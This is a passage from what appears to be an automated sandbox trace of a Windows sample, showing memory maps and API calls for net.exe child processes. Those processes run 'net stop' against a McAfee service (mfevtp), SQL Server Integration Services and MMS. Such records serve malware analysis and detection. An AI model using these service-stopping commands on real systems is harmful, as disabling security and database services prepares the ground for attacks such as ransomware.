region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6550 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6567 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 570 os_tid = 0x1234 [0099.995] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26ff10 | out: lpSystemTimeAsFileTime=0x26ff10*(dwLowDateTime=0xf0c6b1b0, dwHighDateTime=0x1d48689)) [0099.995] GetCurrentProcessId () returned 0x1220 [0099.995] GetCurrentThreadId () returned 0x1234 [0099.995] GetTickCount () returned 0x22c8b [0099.995] QueryPerformanceCounter (in: lpPerformanceCount=0x26ff18 | out: lpPerformanceCount=0x26ff18*=1814691300000) returned 1 [0099.997] GetModuleHandleW (lpModuleName=0x0) returned 0xffae0000 [0099.997] __set_app_type (_Type=0x1) [0099.997] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffaf9c9c) returned 0x0 [0099.997] __getmainargs (in: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788, _DoWildCard=0, _StartInfo=0xffb0479c | out: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788) returned 0 [0099.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.997] GetConsoleOutputCP () returned 0x1b5 [0100.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb0cec0 | out: lpCPInfo=0xffb0cec0) returned 1 [0100.046] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.048] sprintf_s (in: _DstBuf=0x26feb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.048] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.049] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.049] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfevtp /y" [0100.050] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fc50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.050] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.050] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fea8 | out: Buffer=0x26fea8*=0x3a4d40) returned 0x0 [0100.050] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x26fea8 | out: Buffer=0x26fea8*=0x3ac0e0) returned 0x0 [0100.050] _fileno (_File=0x7fefdba2a80) returned 0 [0100.050] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.050] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.050] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.050] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.050] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.051] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.051] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.051] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.051] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.051] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.051] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.051] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.051] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.051] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.051] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.051] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.051] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.051] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.051] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.051] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.051] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.051] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.051] _wcsicmp (_String1="accounts", _String2="mfevtp") returned -12 [0100.051] _wcsicmp (_String1="computer", _String2="mfevtp") returned -10 [0100.051] _wcsicmp (_String1="config", _String2="mfevtp") returned -10 [0100.052] _wcsicmp (_String1="continue", _String2="mfevtp") returned -10 [0100.052] _wcsicmp (_String1="cont", _String2="mfevtp") returned -10 [0100.052] _wcsicmp (_String1="file", _String2="mfevtp") returned -7 [0100.052] _wcsicmp (_String1="files", _String2="mfevtp") returned -7 [0100.052] _wcsicmp (_String1="group", _String2="mfevtp") returned -6 [0100.052] _wcsicmp (_String1="groups", _String2="mfevtp") returned -6 [0100.052] _wcsicmp (_String1="help", _String2="mfevtp") returned -5 [0100.052] _wcsicmp (_String1="helpmsg", _String2="mfevtp") returned -5 [0100.052] _wcsicmp (_String1="localgroup", _String2="mfevtp") returned -1 [0100.052] _wcsicmp (_String1="pause", _String2="mfevtp") returned 3 [0100.052] _wcsicmp (_String1="session", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="sessions", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="sess", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="share", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="start", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="stats", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="statistics", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="stop", _String2="mfevtp") returned 6 [0100.052] _wcsicmp (_String1="time", _String2="mfevtp") returned 7 [0100.052] _wcsicmp (_String1="user", _String2="mfevtp") returned 8 [0100.053] _wcsicmp (_String1="users", _String2="mfevtp") returned 8 [0100.053] _wcsicmp (_String1="msg", _String2="mfevtp") returned 13 [0100.053] _wcsicmp (_String1="messenger", _String2="mfevtp") returned -1 [0100.053] _wcsicmp (_String1="receiver", _String2="mfevtp") returned 5 [0100.053] _wcsicmp (_String1="rcv", _String2="mfevtp") returned 5 [0100.053] _wcsicmp (_String1="netpopup", _String2="mfevtp") returned 1 [0100.053] _wcsicmp (_String1="redirector", _String2="mfevtp") returned 5 [0100.053] _wcsicmp (_String1="redir", _String2="mfevtp") returned 5 [0100.053] _wcsicmp (_String1="rdr", _String2="mfevtp") returned 5 [0100.053] _wcsicmp (_String1="workstation", _String2="mfevtp") returned 10 [0100.053] _wcsicmp (_String1="work", _String2="mfevtp") returned 10 [0100.053] _wcsicmp (_String1="wksta", _String2="mfevtp") returned 10 [0100.053] _wcsicmp (_String1="prdr", _String2="mfevtp") returned 3 [0100.053] _wcsicmp (_String1="devrdr", _String2="mfevtp") returned -9 [0100.053] _wcsicmp (_String1="lanmanworkstation", _String2="mfevtp") returned -1 [0100.053] _wcsicmp (_String1="server", _String2="mfevtp") returned 6 [0100.053] _wcsicmp (_String1="svr", _String2="mfevtp") returned 6 [0100.053] _wcsicmp (_String1="srv", _String2="mfevtp") returned 6 [0100.053] _wcsicmp (_String1="lanmanserver", _String2="mfevtp") returned -1 [0100.053] _wcsicmp (_String1="alerter", _String2="mfevtp") returned -12 [0100.053] _wcsicmp (_String1="netlogon", _String2="mfevtp") returned 1 [0100.054] _wcsupr (in: _String="mfevtp" | out: _String="MFEVTP") returned="MFEVTP" [0100.054] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3ac900 [0100.058] GetServiceKeyNameW (in: hSCManager=0x3ac900, lpDisplayName="MFEVTP", lpServiceName=0xffb05750, lpcchBuffer=0x26fdc8 | out: lpServiceName="", lpcchBuffer=0x26fdc8) returned 0 [0100.059] _wcsicmp (_String1="msg", _String2="MFEVTP") returned 13 [0100.059] _wcsicmp (_String1="messenger", _String2="MFEVTP") returned -1 [0100.059] _wcsicmp (_String1="receiver", _String2="MFEVTP") returned 5 [0100.059] _wcsicmp (_String1="rcv", _String2="MFEVTP") returned 5 [0100.059] _wcsicmp (_String1="redirector", _String2="MFEVTP") returned 5 [0100.059] _wcsicmp (_String1="redir", _String2="MFEVTP") returned 5 [0100.059] _wcsicmp (_String1="rdr", _String2="MFEVTP") returned 5 [0100.059] _wcsicmp (_String1="workstation", _String2="MFEVTP") returned 10 [0100.059] _wcsicmp (_String1="work", _String2="MFEVTP") returned 10 [0100.059] _wcsicmp (_String1="wksta", _String2="MFEVTP") returned 10 [0100.059] _wcsicmp (_String1="prdr", _String2="MFEVTP") returned 3 [0100.060] _wcsicmp (_String1="devrdr", _String2="MFEVTP") returned -9 [0100.060] _wcsicmp (_String1="lanmanworkstation", _String2="MFEVTP") returned -1 [0100.060] _wcsicmp (_String1="server", _String2="MFEVTP") returned 6 [0100.060] _wcsicmp (_String1="svr", _String2="MFEVTP") returned 6 [0100.060] _wcsicmp (_String1="srv", _String2="MFEVTP") returned 6 [0100.060] _wcsicmp (_String1="lanmanserver", _String2="MFEVTP") returned -1 [0100.060] _wcsicmp (_String1="alerter", _String2="MFEVTP") returned -12 [0100.060] _wcsicmp (_String1="netlogon", _String2="MFEVTP") returned 1 [0100.060] NetServiceControl (in: servername=0x0, service="MFEVTP", opcode=0x0, arg=0x0, bufptr=0x26fdd0 | out: bufptr=0x26fdd0) returned 0x889 [0100.061] wcscpy_s (in: _Destination=0xffb080d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.061] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0100.062] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.063] GetFileType (hFile=0xb) returned 0x2 [0100.063] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc98 | out: lpMode=0x26fc98) returned 1 [0100.064] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fc90, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x26fc90*=0x1e) returned 1 [0100.064] GetFileType (hFile=0xb) returned 0x2 [0100.064] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc98 | out: lpMode=0x26fc98) returned 1 [0100.064] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fc90, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x26fc90*=0x2) returned 1 [0100.065] _ultow (in: _Dest=0x889, _Radix=2555136 | out: _Dest=0x889) returned="2185" [0100.065] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.065] GetFileType (hFile=0xb) returned 0x2 [0100.065] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc98 | out: lpMode=0x26fc98) returned 1 [0100.066] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fc90, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x26fc90*=0x34) returned 1 [0100.066] GetFileType (hFile=0xb) returned 0x2 [0100.066] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fc98 | out: lpMode=0x26fc98) returned 1 [0100.066] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fc90, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x26fc90*=0x2) returned 1 [0100.067] NetApiBufferFree (Buffer=0x3a4d40) returned 0x0 [0100.067] NetApiBufferFree (Buffer=0x3ac0e0) returned 0x0 [0100.067] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfevtp /y" [0100.067] exit (_Code=2) Process: id = "148" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x586ed000" os_pid = "0x1218" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MsDtsServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6551 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6552 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6553 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6554 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 6555 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6556 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6557 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6558 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6559 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6560 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6561 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6562 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6563 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 6564 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6565 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6652 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6653 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6654 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6655 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6656 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6657 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6658 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6659 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 6660 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6661 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6662 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6663 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6664 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6665 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6666 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6667 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6668 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6669 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6670 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6671 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 571 os_tid = 0x11a0 Process: id = "149" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5780d000" os_pid = "0x1284" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6568 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6569 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6570 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6571 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6572 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6573 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6574 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6575 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6576 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6577 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6578 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6579 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6580 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6581 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6582 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 573 os_tid = 0x11f0 Process: id = "150" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x56512000" os_pid = "0x1228" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "142" os_parent_pid = "0x11b4" cmd_line = "C:\\Windows\\system32\\net1 stop MMS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6583 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6584 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6585 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6586 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 6587 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6588 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6589 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6590 start_va = 0xffae0000 end_va = 0xffb12fff entry_point = 0xffae0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6591 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6592 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6593 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6594 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6595 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 6596 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6597 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6598 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6599 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6600 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6601 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 6602 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 6603 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6604 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6605 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6606 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6607 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6608 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6609 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" 